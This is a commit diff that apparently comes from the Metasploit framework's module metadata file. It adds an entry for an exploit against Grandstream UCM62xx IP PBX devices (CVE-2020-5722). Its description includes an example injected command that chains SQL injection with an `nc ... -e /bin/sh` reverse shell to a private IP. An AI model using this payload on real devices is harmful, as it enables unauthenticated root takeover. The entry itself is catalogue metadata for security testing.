automatic module_metadata_base.json update
This commit is contained in:
parent
44f040ad78
commit
6164fd9c62
|
@ -60471,6 +60471,67 @@
|
|||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
},
|
||||
"exploit_linux/http/grandstream_ucm62xx_sendemail_rce": {
|
||||
"name": "Grandstream UCM62xx IP PBX sendPasswordEmail RCE",
|
||||
"fullname": "exploit/linux/http/grandstream_ucm62xx_sendemail_rce",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 600,
|
||||
"disclosure_date": "2020-03-23",
|
||||
"type": "exploit",
|
||||
"author": [
|
||||
"jbaines-r7"
|
||||
],
|
||||
"description": "This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and\n a command injection vulnerability (technically, no assigned CVE but was inadvertently\n patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX\n series of devices. The vulnerabilities allow an unauthenticated remote attacker to\n execute commands as root.\n\n Exploitation happens in two stages:\n\n 1. An SQL injection during username lookup while executing the \"Forgot Password\" function.\n 2. A command injection that occurs after the user provided username is passed to a Python script\n via the shell. Like so:\n\n /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n\n This module affect UCM62xx versions before firmware version 1.0.19.20.",
|
||||
"references": [
|
||||
"CVE-2020-5722",
|
||||
"EDB-48247"
|
||||
],
|
||||
"platform": "Linux,Unix",
|
||||
"arch": "cmd, armle",
|
||||
"rport": 8089,
|
||||
"autofilter_ports": [
|
||||
80,
|
||||
8080,
|
||||
443,
|
||||
8000,
|
||||
8888,
|
||||
8880,
|
||||
8008,
|
||||
3000,
|
||||
8443
|
||||
],
|
||||
"autofilter_services": [
|
||||
"http",
|
||||
"https"
|
||||
],
|
||||
"targets": [
|
||||
"Unix Command",
|
||||
"Linux Dropper"
|
||||
],
|
||||
"mod_time": "2022-01-24 21:01:34 +0000",
|
||||
"path": "/modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/http/grandstream_ucm62xx_sendemail_rce",
|
||||
"check": true,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": [
|
||||
"crash-safe"
|
||||
],
|
||||
"Reliability": [
|
||||
"repeatable-session"
|
||||
],
|
||||
"SideEffects": [
|
||||
"ioc-in-logs",
|
||||
"artifacts-on-disk"
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
},
|
||||
"exploit_linux/http/gravcms_exec": {
|
||||
"name": "GravCMS Remote Command Execution",
|
||||
"fullname": "exploit/linux/http/gravcms_exec",
|
||||
|
|
Loading…
Reference in New Issue